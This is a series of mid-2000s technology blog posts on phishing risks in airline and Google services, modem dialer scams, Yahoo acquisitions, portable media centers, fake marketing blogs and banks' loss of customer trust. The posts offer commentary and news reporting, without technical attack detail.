Phishing Airmiles?

As long as people think of phishing as stealing financial data, no one’s safe. Take this email I just received from Virgin Atlantic after signing up for their Flying Club frequent flier program. It’s a great example of how a user could be duped into giving up personal information (including, but not necessarily, financial data) via a socially engineered email.

The email itself is from “flying club <megasaver@fly.virgin.e-rm.co.uk>” which could itself be phishy. Then there’s the text, which begins:

If you would like to view an enhanced version of this email in your web browser, complete with illustrations, please go to: http://s1.e-srv.net:80/?s2=01-4-4COWkFQip_l5uKze-5813

———————————————————————-
INSIDER
———————————————————————-

Dear Mr xxxx,

Start spending time on life… Have you seen our fantastic new look website? Not only does it look good, but the features on the site are great too. As a flying club member, you can now deal with almost all of your flying needs quickly and easily by clicking below: http://s1.e-srv.net:80/?s2=01-4-4COWkFQip_lhG0N2-5045

Now those links work (I’ve removed some digits for security’s sake here), but there’s nothing in there that tells me it’s not a phish. It’s not hard to imagine a phisher sending out an email identical to this and luring the victim into giving up account details — at least enough for the phisher to then impersonate the customer and make flight bookings, alter bookings, steal airmiles or even access other data using that information.

We’ve said it before: Phishing bank accounts is just the beginning. Companies going online: Wise up and use links that users can verify visually, as much as possible.

Sad News For The Review

Sad news: As of today, the Far Eastern Economic Review, primary home to the Loose Wire column for the past few years, has ceased publishing as a weekly magazine. That means that the column will move elseswhere, although WSJ.com readers will continue to be able to read it online. For FEER and other readers, please do drop me an email if you’d like to be kept informed of the column’s new home once I’ve decided where it’s going to be.

Loose Wire blog will continue as usual.

How To Phish Google

I’ve long believed that phishing emails are just the beginning of a new kind of fraud which is likely to be sophisticated and fast moving. Here’s an example of what they might look like, courtesty of a British computer scientist called Jim Ley, written up at the security website Netcraft. Ley, Netcraft says, “has demonstrated that opportunities exist for fraudsters to launch phishing attacks using cross site scripting bugs on the very widely used Google sites.”

I’m not quite clear from either account whether this is one vulnerability or more, and whether it applies only since Google extended their desktop search to include files on your computer (rather than on the Internet).

As far as I can figure it out, it works like this. A bad guy, rather than try to lure a victim to his dodgy website using a socially engineered email or a virus, would ‘inject’ content into Google to do the same thing. So, say, a user would visit Google to find a credit card submission form which explains that Google is soon to become a subscription-only service at $5 per month, but that users could take advantage of an earlybird special offer to obtain lifetime free searches for just $10. (This is Ley’s example, cited by Netcraft.)

Another vulnerability included in the Google Desktop would, Netcraft says, have “allowed an attacker to search a user’s local machine for passwords and report the results directly back to the attacker’s own web site.” Both vulnerabilities have been fixed, but Netcraft and Ley say incompletely.

I don’t claim to understand the technical aspects of this, and it may be somewhat obscure. But what is worrying is that (a) Ley reports Google as being less than interested in addressing the issues he raised (two years ago, according to his website) and, (b) that if such tricks are occurring to diligent folk like Ley, they must be occurring to hackers and the Internet underground. I’ve said it before, and I’ll say it again: Phishing is not just misleading emails, it’s a multifaceted effort to part us ordinary folk from our online money. And it’s not going to go away. Indeed, like most things technological, it’s a fast escalating arms race, and I don’t think we’ve even started to get it figured out.

Dialer Scams And Heads In The Sand

I can’t help feeling that telephone companies and Internet Service Providers are in real danger of legal action if they don’t tackle the problem of modem dialing.

This NBC5 story from Chicago quotes a local woman as complaining about a series of weird calls to her phone company, SBC. The answer: “They didn’t know too much about it. They said, ‘Well, you might want to check with your Internet provider,'” the customer recalled. Her ISP, AOL, wasn’t any more helpful. “The person said basically there was nothing they could do; these charges were not coming from them, therefore, they can’t credit us, they can’t help us,” the customer said.

Phone companies and, to a lesser extent, ISPs, can’t stick their heads in the sand on this. They mustn’t palm off customers with stupid answers, and they must investigate themselves the companies behind these scams. If they don’t, class action suits are bound to follow.

Yahoo! Buys Bloomba

Yahoo! has bought Stata Labs, the guys behind Bloomba an excellent email program that is more of a database.

In a statement the company said they “intend to continue supporting Stata Labs’ existing customers for one year from the date of product purchase”. They said that while there is no word on what Yahoo! will do with Bloomba, there will be no more sales of the program, and folks who bought Bloomba within the last thirty days are eligible for a full refund.

As Reuters points out in a story on the purchase, Microsoft recently bought Lookout, a plugin that allows users to better search Outlook. Given that Bloomba has been described (pre-Gmail) as the Google of email, you might get an idea where this is all going. The big game in town seems to be to offer some sort of product that allows folk to get a better grip on searching their emails, contacts, what-have-you. Bloomba did a pretty good job of that.

And don’t forget that Yahoo! bought OddPost a few months back. Oddpost wraps email, RSS and other stuff into a kind of web-based email program. Neat stuff, although since Yahoo! bought it I’ve not heard anything more of it. Would be sad to see all this great stuff somehow get lost. And since I’ve recommended both products to readers in the past, should I and others be more wary about raving about stuff that gets sold off and subsequently disappears?

Portable Media Centers: Damp Squibs?

How big are Portable Media Centers going to be?

Not very, says The Diffusion Group, a Dallas-based research consultancy. In a report it says both Microsoft-based and non-MS-based media players with video, audio and photo capabilities will “face stiff competition from less-expensive application-specific alternatives such as MP3 players, portable DVD players, and new portable photo storage technologies”.

Partly it’s price: “while PMCs offer consumers an ‘all-in-one’ package, its $500 price tag will make single application devices much more attractive to consumers,” Diffusion says. The other limitation is: Do people really want all this stuff? Given the main attraction of a PMC is storing and playing back video, and given that most folk still don’t use handheld video recorders (I’m guessing PVR here means portable or personal video recorders) as much as expected, “demand for a portable PVR is likely to remain very low for the next several years.” Then, says Diffusion, there are alternatives: Portable TVs are cheap, and the more fancy high end stuff, like Sony’s new LF-X5 with its live digital TV viewing with integrated Wi-Fi connectivity and a 7-inch viewing screen, are going to get cheaper.

I respectfully disagree. I don’t think everyone who has an iPod is going to get a PMC. But you only need to sit on a Virgin Atlantic flight and watch people tap into their fully independent video-on-demand (select programs, stop and start, fast forward and rewind) screens to see the power of portable video. Just because people aren’t using their PVRs as much as we expected, doesn’t mean they don’t want to watch video everywhere they go. And while personal TVs may satisfy some of this market, what is that compared to being able to store a few episodes of Seinfeld to watch on the train to work? If we’ve learned nothing else from MP3 players, we’ve realised that people want to design and personalise their portable entertainment. If not, everyone would still be carrying around portable radios. As prices drop — even Diffusion anticipates that the price of portable media centers will decline by more than 50% to below $250 in a couple of years — I think there’ll be more and more people packing these things.

Even Mayors Get Dialer Scammed

It’s not just small fry getting hooked in the great modem hijacking/dialer scam.

The Derrick, a publication from Pennsylvania’s Oil City, reports the town’s former mayor has become embroiled, demanding Verizon forgive $1,200 in charges. Verizon has so far refused to forgive Malachy McMahon’s debt.

McMahon is going after Verizon, who he sees as complicit in the scam: “For a corporation to condone and profit from this is beyond me, in the case of Verizon,” the publication quoted McMahon as saying. “It’s illegal activity. They’re after phone usage. It’s big-time money when they go overseas.” Local prosecutors are looking into this and other cases.

Part of the problem is that the billing is not just to the telco. Another company, National One Telecom, claims he owes $76 for calls. National One seems to make its money from charging an “entertainment fee” for accessing certain websites — which are not named on the bills. Some of the fee goes to the telco, some to National One. This is how National Telecom describes itself:

National One Telecom, Inc.’s mission is to provide billing solutions for clients with audiotext services, videotext services, long distance services, and other telecommunications services.

Our goal is to seamlessly merge Internet technologies with technologies seen in traditional telephone networks. Together with our clients we create a bridge between the two allowing for better ecommerce and telephone access to a wide national audience.

In addition to this, we are committed to helping our customers understand these new billing solutions and are willing to walk them through step by step in case they have any questions or problems. Thank you for your business.

Hmm. The most amusing bit of the Derrick story is this end quote from a Verizon spokesman: Modem hijacking, while “an industry-wide problem, is not really a telephone-company issue per se. It’s really an Internet issue.” Sure. Telcos, watch out.

Yahoo! Goes Outside For Searches

Maybe it’s just Yahoo! trying out the competition, but a press release from Tucson, AZ-based Webglimpse.net, maintainers of the Glimpse search engine, say that Yahoo! has “purchased several licenses” of its software for internal use. Glimpse is a C program for fast searching of large numbers of text files on Unix systems. It is at the core of Webglimpse, a website search engine.

WebGlimpse’s Golda Velez says: “As I understand it this will be used by Yahoo! and Overture developers as a tool to search local datasets, possibly a large code base.” Why isn’t Yahoo using its own software for this kind of thing?

Faux Blogs And The Art Of The Dupe

Are fake blogs savvy marketing tools or the thin end of a wedge that will undermine the credibility of all blogs?

Dennis Nishi has a piece in Sunday’s Chicago Tribune about fake blogs or faux blogs, a topic I’ve blazed off about before.

He points to Beta-7, a fake blog conceived, if that’s the right word, by the New York office of Portland, Ore.-based advertising agency Wieden & Kennedy. ”The blog was intended to create a buzz for Sega’s “ESPN NFL Football 2K4” game and draw attention away from Electronic Arts’ “Madden Football 2004″–the game that dominates the segment,” Nishi writes. “The Beta-7 blog and two others featured pictures of injuries suffered by gamers during blackouts, and bulletin-board messages were posted across the Internet about the adverse side effects of playing. Confidential company memos–purportedly acquired by another game tester–were posted that portrayed Sega as increasingly worried about the problems.” The whole thing was basically a scam: “Beta-7 ran for four months and ended with the September release of the game. The beginning and end of the campaign were scripted ahead of time, but everything in between was created on the fly and in response to how the audience reacted.”

Of course, we can get all snotty about this. But the bottom line is that the site attracted 2.2 million visitors, and sales improved over last year by 20 percent, selling about 360,000 games. It was certainly more successful than Dr Pepper/7 Up Inc.’s Raging Cow, a flavored-milk drink targeted at teens and young adults. Nishi writes that when legitimate bloggers discovered that company-sponsored shills were recruited to post comments to blogs, some bloggers responded by creating a Web site to boycott Raging Cow. “The boycott is going a year later.” Warner Bros also got sliced when editors of blogs traced suspiciously positive comments about a band Warner Bros.

To me the whole thing is silly and misleading. Blogging is a new medium and doesn’t need this kind of Trojan Horse pretence. But I guess there’s also an argument that if users are dumb enough — or wise but willing to be entertained — then it doesn’t really matter. Hell, what passes for news on TV these days is more often than not just dressed-up reality TV. I guess I’d hoped blogging would remain a raw, honest medium for a while longer, and that a keen and clear understanding of the blogger’s background and motives would be the first thing readers would look for.

Phishing Takes Its Toll

Is phishing beginning to take its toll on banks?

It’s been my belief for some time that this is, or would be, the case. Banks have seen the Internet as a cash cow and have been over-eager to milk it without realising that it’s not just a way to grab more customers and slice overheads. The Internet is a world unto itself, with its own rules, its own technologies — and its own scams. Banks and the Internet make sense, but not if banks think that an online department can be set up in a few weeks and staffed by a few sysops.

That’s why phishing is such an important wake-up call. It’s the first seriously clever scam that online banking has faced, and banks — and other institutions — have done a very poor job in responding to it. Sure, they’re beginning to now, but not after anything between $500 million and $5 billion has been lost to phishers. Whatever the figure, some folk made some serious money out of phishing, which means that Internet-based financial crime is going to be the main attraction for every criminal with half a brain from here to Archangel.

Which is where a new survey, reported by this month’s American Banker magazine (subscription only), comes in.

The article says that “nearly 30% of respondents to the 2004 American Banker/Gallup Consumer Survey said they think a bank has violated their financial privacy. That is the highest level since the question was first asked in 2001 and “a statistic you want to pay attention to,” said John J. Byrne, director of the American Bankers Association’s Center for Regulatory Compliance”. The article goes on to say: “A possible explanation for the increased perception among consumers that banks have violated their privacy may be the rising incidence of sophisticated identity-theft operations such as “phishing,” say experts.”

Of course, banks are going to say it’s not their fault: “Peter Cassidy, secretary general of the group, said that it is common for victims of phishing attacks to blame their financial institution for the loss of their personal information, despite the fact that the company had no involvement in the scam.” Of course banks are involved, in the sense that they did not heed the problem when it first appeared more than a year ago, but let’s not dwell on that. The bigger problem, the magazine says, is maintaining customer trust. “Dollar-for-dollar, the loss of customers’ trust that a bank is a safe place to put their money is a potentially bigger deal than all of the money people have lost to phishing attacks so far,” Mr. Cassidy said.

While the article swings between the idea of privacy as in releasing information to third parties for marketing purposes, and privacy as in “why did you let someone steal all my money from my account?”, to me the problem is pretty much the same. Any institution that plays fast and loose with your data — by letting third parties email trying to sell you stuff, to banks that see their online services as another way to flog more services (two banks I deal with try this, one by having lots of rubbish on their logout page that confuses the user who is looking for certainty they’ve logged out — admittedly better than a few months ago when they had a message along the lines of ‘you’ve logged out but you haven’t logged off’ along with a picture of a palm tree and an offer of travel insurance — while another forces me to sit through an ad for special interest deposit accounts while I call their helpline via an IDD call) — any institution that does this kind of thing is of course going to score low with the customer. “Is my bank spending time protecting my assets or trying to sell me more snake oil?” would be a reasonable question to ask in the face of this marketing onslaught.

I think banks are going to lose customers if they can’t figure out ways to make online banking more secure. And it’s not just about educating users, although that’s part of it. It’s really listening hard to people who know about some of the scams — and vulnerabilities that lead to scams — out there, and then trying to pre-empt them. In the end it’s about making a technology that is as bulletproof as you can make it.